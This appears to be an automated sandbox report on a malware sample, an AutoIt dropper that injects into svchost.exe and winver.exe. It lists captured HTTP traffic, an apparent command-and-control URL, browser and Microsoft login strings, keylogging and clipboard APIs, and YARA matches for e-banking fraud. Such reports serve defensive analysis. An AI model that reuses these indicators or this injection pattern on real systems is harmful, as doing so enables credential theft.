38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: XWDsAjkFcK.exe, 00000006.00000002.2560990702.00000000053A3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpterbaruwaktu3.xyz
                Source: XWDsAjkFcK.exe, 00000006.00000002.2560990702.00000000053A3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rtpterbaruwaktu3.xyz/mv7p/
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10339W
                Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 00000005.00000002.2550854320.0000000003026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 00000005.00000003.1908161878.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winver.exe, 00000005.00000002.2560762687.0000000005888000.00000004.10000000.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000002.2559116718.0000000003608000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003D4164
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003D4164
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003D3F66
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003C001C
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003ECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003ECABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: This is a third-party compiled AutoIt script.0_2_00363B3A
                Source: aBEh0fsi2c.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: aBEh0fsi2c.exe, 00000000.00000000.1301225079.0000000000414000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_73d97cdf-c
                Source: aBEh0fsi2c.exe, 00000000.00000000.1301225079.0000000000414000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_07295324-4
                Source: aBEh0fsi2c.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5c2174d9-3
                Source: aBEh0fsi2c.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7c0ffb6a-8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C9F3 NtClose,2_2_0042C9F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA5D NtDelayExecution,2_2_0040AA5D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,2_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_003CA1EF
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003B85B1 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_003B85B1
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003C51BD
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0036E6A00_2_0036E6A0
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0038D9750_2_0038D975
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_0036FCE00_2_0036FCE0
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003821C50_2_003821C5
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003962D20_2_003962D2
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003E03DA0_2_003E03DA
